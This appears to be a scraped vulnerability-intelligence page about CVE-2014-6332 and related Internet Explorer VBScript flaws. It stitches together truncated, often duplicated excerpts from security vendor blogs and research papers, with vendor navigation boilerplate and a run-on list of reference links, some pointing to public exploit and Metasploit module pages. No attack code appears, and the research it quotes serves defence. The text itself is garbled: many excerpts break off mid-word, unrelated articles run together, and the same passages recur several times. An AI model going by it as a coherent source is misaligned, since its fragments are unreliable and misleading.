By: Elliot Cao 2018/09/25 Read time: ( words)
Save to Folio
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability CVE-2018-8373 that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability. It's important to note that this exploit doesn't work on systems with updated Internet Explorer versions.
Instead of modifying the CONTEXT structure of NtCo
Trendmicro
New CVE-2018-8373 Exploit Spotted
blogs_trendmicro·2018-09-25·CVSS 8.8
CVE-2018-8373 [HIGH] New CVE-2018-8373 Exploit Spotted
Exploits & Vulnerabilities
## New CVE-2018-8373 Exploit Spotted
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability.
By: Elliot Cao Sep 25, 2018 Read time: ( words)
Save to Folio
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability CVE-2018-8373 that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability. It's important to note that this exploit doesn't work on systems with updated Internet Explorer versions.
Instead of modifying the CONTEXT structure of Nt
Trendmicro
New CVE-2018-8373 Exploit Spotted
blogs_trendmicro·2018-09-25·CVSS 8.8
CVE-2018-8373 [HIGH] New CVE-2018-8373 Exploit Spotted
Ausnutzung von Schwachstellen
## New CVE-2018-8373 Exploit Spotted
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability.
By: Elliot Cao Sep 25, 2018 Read time: ( words)
Save to Folio
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability CVE-2018-8373 that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability. It's important to note that this exploit doesn't work on systems with updated Internet Explorer versions.
Instead of modifying the CONTEXT structure of
Trendmicro
New CVE-2018-8373 Exploit Spotted
blogs_trendmicro·2018-09-25·CVSS 8.8
CVE-2018-8373 [HIGH] New CVE-2018-8373 Exploit Spotted
Exploits & Vulnerabilities
# New CVE-2018-8373 Exploit Spotted
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability.
By: Elliot Cao
2018/09/25
Read time: ( words)
Save to Folio
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability CVE-2018-8373 that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability. It's important to note that this exploit doesn't work on systems with updated Internet Explorer versions.
Instead of modifying the CONTEXT structure of NtCo
Unit42
Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42·2018-09-05·CVSS 7.5
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Threat Research Center
Trend Reports
Vulnerabilities
## Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: September 5, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2018-8174
ELink
Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here . We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerabil
Unit42
Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42·2018-09-05·CVSS 7.5
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here. We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerability we discuss below) using the Double Kill exploit.
What we found this quarter was that vulnerabilities under attack remained consistent, including very old vulnerabilities. One new vulnerability used zero-day attacks did rocket to near the top of the list.
The United States remained the num
Securelist
Delving deep into VBScript
blogs_securelist·2018-07-03·CVSS 8.8
CVE-2018-8174 [HIGH] Delving deep into VBScript
Authors
Boris Larin
## Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174 , a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.
But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of th
Securelist
Delving deep into VBScript
blogs_securelist·2018-07-03·CVSS 8.8
CVE-2018-8174 [HIGH] Delving deep into VBScript
Authors
- Boris Larin
## Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.
But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of t
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
[CRITICAL] The Old and New: Current Trends in Web-based Threats
Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
Statistics analysis
CVEs
In the first quarter of 2018, we found 1583 malicious URLs across 496 different domains. Attackers used at least 8 old and public vulnerabilities as shown in Figure 1. The Top 3 CVEs used are
1. CVE-2014-6332: exploited by 774 malicious URLs
2. CVE-2016-0189: exploited by 219 malicious URLs
3. CVE-2015-5122: exploited by 85 malici
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
CVE-2014-6332 [CRITICAL] The Old and New: Current Trends in Web-based Threats
Threat Research Center
Trend Reports
Vulnerabilities
## The Old and New: Current Trends in Web-based Threats
Tao Yan
Bo Qu
Zhanglin He
Rongbo Shao
Published: June 20, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2014-6332
CVE-2016-0189
EK
Exploit kit
KaiXin
Rig
Sundown
Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
Statistics analysis
CVEs
In the first quarter of 2018, we found 1
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
- Vladislav Stolyarov
- Boris Larin
- Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
### Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
Vladislav Stolyarov
Boris Larin
Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
## Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After the
Zscaler
Terror Exploit Kit via Malvertising campaign | Zscaler Blog
blogs_zscaler·2017-10-24
Terror Exploit Kit via Malvertising campaign | Zscaler Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Securelist
IT threat evolution Q1 2017. Statistics
blogs_securelist·2017-05-22
IT threat evolution Q1 2017. Statistics
Table of Contents
- Q1 figures
- Mobile threats
- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Vladislav Stolyarov
## Q1 figures
According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.
79,209,775 unique URLs were recognized as malicious by web antivirus components.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.
Crypto ransomware attacks were blocked on 240,799 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and pot
Securelist
IT threat evolution Q1 2017. Statistics
blogs_securelist·2017-05-22
IT threat evolution Q1 2017. Statistics
Table of Contents
Q1 figures
Mobile threats
Q1 events
The rise of Trojan-Ransom.AndroidOS.Egat
Revamped ZTorg
Asacub awakens
Mobile threat statistics
Distribution of mobile malware by type
TOP 20 mobile malware programs
The geography of mobile threats
Mobile banking Trojans
Mobile Ransomware
Vulnerable apps exploited by cybercriminals
Online threats (Web-based attacks)
Online threats in the banking sector
Geography of attacks
The TOP 10 banking malware families
Ransomware Trojans
The number of users attacked by ransomware
The geography of attacks
Top 10 countries attacked by cryptors
Top 10 most widespread cryptor families
Top 10 countries where online resources are seeded with malware
Countries where users faced the greatest risk of online infection
Local threats
Zscaler
A Case Of Keitaro (featuring RIG And Nuclear) | Zscaler
blogs_zscaler·2016-02-29
A Case Of Keitaro (featuring RIG And Nuclear) | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Zscaler
Bad Actors On GMHOST Alexander Mulgin Serginovic | Zscaler
blogs_zscaler·2016-01-12·CVSS 9.8
[CRITICAL] Bad Actors On GMHOST Alexander Mulgin Serginovic | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Unit42
Attack on French Diplomat Linked to Operation Lotus Blossom
blogs_unit42·2015-12-18·CVSS 8.8
CVE-2014-6332 [HIGH] Attack on French Diplomat Linked to Operation Lotus Blossom
We observed a targeted attack in November directed at an individual working for the French Ministry of Foreign Affairs. The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and contained an invitation to a Science and Technology support group event.
The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept (POC) code to install a Trojan called Emissary, which is related to the Operation Lotus Blossom campaign. The TTPs used in this attack also match those detailed in the paper. The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan.
We have created the Emissary tag
Unit42
Attack on French Diplomat Linked to Operation Lotus Blossom
blogs_unit42·2015-12-18·CVSS 8.8
[HIGH] Attack on French Diplomat Linked to Operation Lotus Blossom
## Attack on French Diplomat Linked to Operation Lotus Blossom
Robert Falcone
Jen Miller-Osborn
Published: December 18, 2015
Malware
Threat Research
Email
Emissary
Lotus Blossom
Spear Phishing
We observed a targeted attack in November directed at an individual working for the French Ministry of Foreign Affairs. The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and contained an invitation to a Science and Technology support group event.
The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept (POC) code to install a Trojan called Emissary, which is related to the Operation Lotus Blossom campaign. The TTPs used in this attack also match those detailed in the paper. The targeting of th
Unit42
UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
blogs_unit42·2015-07-27·CVSS 9.8
CVE-2015-3113 [CRITICAL] UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
A June 23 FireEye blog post titled “Operation Clandestine Wolf” discussed a cyber espionage group, known as APT3, that had been exploiting a zero-day vulnerability in Adobe Flash. Unit 42 also tracks the APT3 group using the name UPS, which is an intrusion set with Chinese origins that is known for having early access to zero-day vulnerabilities and delivering a backdoor called Pirpi.
The UPS group has exploited several zero-day vulnerabilities, most recently using the zero-days released in the Hacking Team breach that we discussed in our July 10 blog post, “APT Group UPS Targets US Government with Hacking Team Flash Exploit”. However, the most recent original zero-day released by this group is tracked by CVE-2015-3113, which has similarities to the once zero-day vulnerabilities CVE-2014-
Unit42
UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
blogs_unit42·2015-07-27·CVSS 9.8
CVE-2015-3113 [CRITICAL] UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
## UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
Robert Falcone
Richard Wartell
Published: July 27, 2015
Threat Research
Vulnerabilities
ActionScript
Adobe Flash
APT3
Internet Explorer
Operation Clandestine Wolf
Pirpi
Shellcode
Steganography
UPS
Zero-days
A June 23 FireEye blog post titled “Operation Clandestine Wolf” discussed a cyber espionage group, known as APT3, that had been exploiting a zero-day vulnerability in Adobe Flash. Unit 42 also tracks the APT3 group using the name UPS, which is an intrusion set with Chinese origins that is known for having early access to zero-day vulnerabilities and delivering a backdoor called Pirpi.
The UPS group has exploited several zero-day vulnerabilities, most recently using the zero-days released in th
Unit42
Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
blogs_unit42·2015-06-11
Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
## Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
Robert Falcone
Published: June 11, 2015
Malware
Threat Research
Evilgrab
IFRAME
JavaScript
Myanmar
Trojan
Vidgrab
Watering Hole Attack
On May 12, 2015, Unit 42 observed an apparent watering hole attack, also known as a strategic website compromise (SWC), involving the President of Myanmar's website. Visiting the main page hosted at "www.president-office.gov[.]mm" triggered the malicious content, as the threat actors injected an inline frame (IFRAME) into a JavaScript file used by Drupal for the site's theme.
Unit 42 believes threat actors chose this website to set up a watering hole in order to target and gather information on individuals in Myanmar, individuals involved in political relations wit
Unit42
Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
blogs_unit42·2015-06-11
Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
On May 12, 2015, Unit 42 observed an apparent watering hole attack, also known as a strategic website compromise (SWC), involving the President of Myanmar's website. Visiting the main page hosted at "www.president-office.gov[.]mm" triggered the malicious content, as the threat actors injected an inline frame (IFRAME) into a JavaScript file used by Drupal for the site's theme.
Unit 42 believes threat actors chose this website to set up a watering hole in order to target and gather information on individuals in Myanmar, individuals involved in political relations with the country and/or organizations doing business in Myanmar. Unit 42 has evidence to suggest the threat actors have had access to the website since November 2014 if not earlier.
Shortly after we reported the infection to the o
Unit42
Don’t Miss A Single Threat Intelligence Update from Unit 42!
blogs_unit42·2014-12-29·CVSS 10.0
[CRITICAL] Don’t Miss A Single Threat Intelligence Update from Unit 42!
## Don’t Miss A Single Threat Intelligence Update from Unit 42!
Chad Berndtson
Published: December 29, 2014
Malware
Threat Research
419 Evolution
CoolReaper
Threat intelligence
Threat Landscape Review
Whitepaper
WireLurker
Unit 42 is the Palo Alto Networks threat intelligence team. Made up of accomplished cybersecurity researchers and industry experts, Unit 42 gathers, researches, analyzes, and provides insights into the latest cyber threats, then shares them with Palo Alto Networks customers, partners and the broader community to better protect enterprise, service provider, and government computing environments.
You can now have up-to-the-minute threat intelligence updates from Unit 42 delivered right to your inbox, as they’re posted. Click here to subscribe.
Regular researc
Unit42
Don’t Miss A Single Threat Intelligence Update from Unit 42!
blogs_unit42·2014-12-29·CVSS 10.0
[CRITICAL] Don’t Miss A Single Threat Intelligence Update from Unit 42!
Unit 42 is the Palo Alto Networks threat intelligence team. Made up of accomplished cybersecurity researchers and industry experts, Unit 42 gathers, researches, analyzes, and provides insights into the latest cyber threats, then shares them with Palo Alto Networks customers, partners and the broader community to better protect enterprise, service provider, and government computing environments.
You can now have up-to-the-minute threat intelligence updates from Unit 42 delivered right to your inbox, as they’re posted. Click here to subscribe.
Regular research analysis is posted to the Unit 42 threat intelligence blog. Unit 42 also publishes whitepapers examining, in detail, threats to mobile device ecosystems, APTs, malware attack patterns and other subjects crucial to any security practi
Talos
Ancient Mac Site Harbors Botnet that Exploits IE Vulnerability
blogs_talos·2014-12-15·CVSS 8.8
CVE-2014-6332 [HIGH] Ancient Mac Site Harbors Botnet that Exploits IE Vulnerability
This post was authored by Alex Chiu and Shaun Hurley.
Last month, Microsoft released a security bulletin to patch CVE-2014-6332, a vulnerability within Windows Object Linking and Embedding (OLE) that could result in remote code execution if a user views a maliciously crafted web page with Microsoft Internet Explorer. Since then, there have been several documented examples of attackers leveraging this vulnerability and attempting to compromise users. On November 26th, Talos began observing and blocking an attack disguised as a hidden iframe on a compromised domain to leverage this vulnerability and compromise Internet Explorer users.
### A High Level Look at the AttackOne attack vector that has been highly effective in the past is compromising and leveraging a vulnerable site to direct us
Talos
Ancient Mac Site Harbors Botnet that Exploits IE Vulnerability
blogs_talos·2014-12-15·CVSS 8.8
CVE-2014-6332 [HIGH] Ancient Mac Site Harbors Botnet that Exploits IE Vulnerability
## Ancient Mac Site Harbors Botnet that Exploits IE Vulnerability
This post was authored by Alex Chiu and Shaun Hurley .
Last month, Microsoft released a security bulletin to patch CVE-2014-6332, a vulnerability within Windows Object Linking and Embedding (OLE) that could result in remote code execution if a user views a maliciously crafted web page with Microsoft Internet Explorer. Since then, there have been several documented examples of attackers leveraging this vulnerability and attempting to compromise users. On November 26th, Talos began observing and blocking an attack disguised as a hidden iframe on a compromised domain to leverage this vulnerability and compromise Internet Explorer users.
Zscaler
Defaced Websites Leading To Dokta Chef Exploit Kit | Zscaler
blogs_zscaler·2014-11-26·CVSS 8.8
[HIGH] Defaced Websites Leading To Dokta Chef Exploit Kit | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Unit42
Addressing CVE-2014-6332 SWF Exploit
blogs_unit42·2014-11-26·CVSS 8.8
CVE-2014-6332 [HIGH] Addressing CVE-2014-6332 SWF Exploit
## Addressing CVE-2014-6332 SWF Exploit
Palo Alto Networks
Published: November 26, 2014
Threat Research
Vulnerabilities
EMET
Endpoint
Internet Explorer
Shellcode
Continuing a recent trend in which Internet Explorer vulnerabilities are exploited using Flash, samples of an SWF purportedly used in conjunction with CVE-2014-6332 have appeared in several places. The most famous examples of this trend are the exploits for CVE-2014-0322 and CVE-2014-1776 .
We have yet to encounter the SWF sample with its original exploit attached, but by looking at the SWF, it is clear that it is constructed to function with several forms of memory corruption, making the vulnerability itself less interesting. That is a great example of why our Advanced Endpoint Protection approach, which focuses on the
Unit42
Addressing CVE-2014-6332 SWF Exploit
blogs_unit42·2014-11-26·CVSS 8.8
CVE-2014-6332 [HIGH] Addressing CVE-2014-6332 SWF Exploit
Continuing a recent trend in which Internet Explorer vulnerabilities are exploited using Flash, samples of an SWF purportedly used in conjunction with CVE-2014-6332 have appeared in several places. The most famous examples of this trend are the exploits for CVE-2014-0322 and CVE-2014-1776.
We have yet to encounter the SWF sample with its original exploit attached, but by looking at the SWF, it is clear that it is constructed to function with several forms of memory corruption, making the vulnerability itself less interesting. That is a great example of why our Advanced Endpoint Protection approach, which focuses on the core techniques used in attacks, works well. It will prevent uses of this SWF framework, regardless of the vulnerability it is used with.
The interesting part in this expl
Talos
Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
blogs_talos·2014-11-11·CVSS 7.8
[HIGH] Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
## Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
This month Microsoft is releasing 14 security bulletins. Originally they had planned to release 16, but due to issues that emerged in late testing, two bulletins that were announced in the Advance Security Notification, MS14-068 and MS14-075, have been postponed. Of the 14 bulletins, four are considered critical, eight are important, while two are moderate. They cover a total of 33 CVEs.
We’ll start off with the four critical bulletins, for a total of 21 CVEs that can result in remote code execution:
Our first bulletin of the month is MS14-064 and fixes two vulnerabilities ( CVE-2014-6332 , CVE-2014-6352 ) in Windows Object Linking and Embedding (OLE) that could allow remote code execution. Both issues are seei
Talos
Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
blogs_talos·2014-11-11·CVSS 7.8
[HIGH] Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
This month Microsoft is releasing 14 security bulletins. Originally they had planned to release 16, but due to issues that emerged in late testing, two bulletins that were announced in the Advance Security Notification, MS14-068 and MS14-075, have been postponed. Of the 14 bulletins, four are considered critical, eight are important, while two are moderate. They cover a total of 33 CVEs.
We’ll start off with the four critical bulletins, for a total of 21 CVEs that can result in remote code execution:
Our first bulletin of the month is MS14-064 and fixes two vulnerabilities (CVE-2014-6332, CVE-2014-6352) in Windows Object Linking and Embedding (OLE) that could allow remote code execution. Both issues are seeing attack in the wild and can be considered 0-days. CVE-2014-6352 is a vulnerabil
Recorded Future
Tracking Moving Targets: Exploit Kits and CVEs
blogs_recorded_future
Tracking Moving Targets: Exploit Kits and CVEs
# Tracking Moving Targets: Exploit Kits and CVEs
One year ago a notorious programmer Paunch, who coded the Blackhole exploit kit, was arrested and charged for the distribution and sale of his wares. Blackhole was an epic Russian exploit kit, rented and used by thousands for their successful campaigns against a range of targets.
Since Paunch’s arrest, the exploit kit threat landscape has changed significantly as malicious actors have sought out new tool kits. Recorded Future undertook the task of analyzing over 600,000 unique web sources to identify the most prevalent exploit kits, what CVEs they commonly leverage, and what the most vulnerable products are.
To get started, let’s craft a simple query looking for mentions of any exploit kit over the last six months.
###### Click image for
Recorded Future
Tracking Moving Targets: Exploit Kits and CVEs
blogs_recorded_future
Tracking Moving Targets: Exploit Kits and CVEs
## Tracking Moving Targets: Exploit Kits and CVEs
One year ago a notorious programmer Paunch, who coded the Blackhole exploit kit , was arrested and charged for the distribution and sale of his wares. Blackhole was an epic Russian exploit kit, rented and used by thousands for their successful campaigns against a range of targets.
Since Paunch’s arrest , the exploit kit threat landscape has changed significantly as malicious actors have sought out new tool kits. Recorded Future undertook the task of analyzing over 600,000 unique web sources to identify the most prevalent exploit kits, what CVEs they commonly leverage, and what the most vulnerable products are.
To get started, let’s craft a simple query looking for mentions of any exploit kit over the last six months.
## Click image for
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Technical Aspects of Cyber Kill Chain
arxiv_fulltext·2016-06-10
Technical Aspects of Cyber Kill Chain
Technical Aspects of Cyber Kill Chain
Tarun Yadav
Scientist, Defence Research and\ Organisation, INDIA\ : [email protected]
Rao Arvind Mallari
Scientist, Defence Research and\ Organisation, INDIA\ :[email protected]
## Abstract
Recent trends in targeted cyber-attacks has increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. Cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. Cyber kill chain in simple terms is an attack chain, the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categories the methodologies, techniques and tools involv
http://packetstormsecurity.com/files/134053/Avant-Browser-Lite-Ultimate-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134061/The-World-Browser-3.0-Final-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134062/HTML-Compiler-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134064/Microsoft-Compiled-HTML-Help-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134079/Winamp-Bento-Browser-Remote-Code-Execution.htmlhttp://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windowshttp://www.kb.cert.org/vuls/id/158647http://www.securityfocus.com/bid/70952http://www.securitytracker.com/id/1031184http://www.us-cert.gov/ncas/alerts/TA14-318Bhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-064https://forsec.nl/wp-content/uploads/2014/11/ms14_064_ie_olerce.rb_.txthttps://www.exploit-db.com/exploits/37668/https://www.exploit-db.com/exploits/37800/https://www.exploit-db.com/exploits/38500/https://www.exploit-db.com/exploits/38512/http://packetstormsecurity.com/files/134053/Avant-Browser-Lite-Ultimate-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134061/The-World-Browser-3.0-Final-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134062/HTML-Compiler-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134064/Microsoft-Compiled-HTML-Help-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/134079/Winamp-Bento-Browser-Remote-Code-Execution.htmlhttp://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windowshttp://www.kb.cert.org/vuls/id/158647http://www.securityfocus.com/bid/70952http://www.securitytracker.com/id/1031184http://www.us-cert.gov/ncas/alerts/TA14-318Bhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-064https://forsec.nl/wp-content/uploads/2014/11/ms14_064_ie_olerce.rb_.txthttps://www.exploit-db.com/exploits/37668/https://www.exploit-db.com/exploits/37800/https://www.exploit-db.com/exploits/38500/https://www.exploit-db.com/exploits/38512/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-6332
2014-11-11
Published
2022-03-25
Added to CISA KEV
Exploited in the wild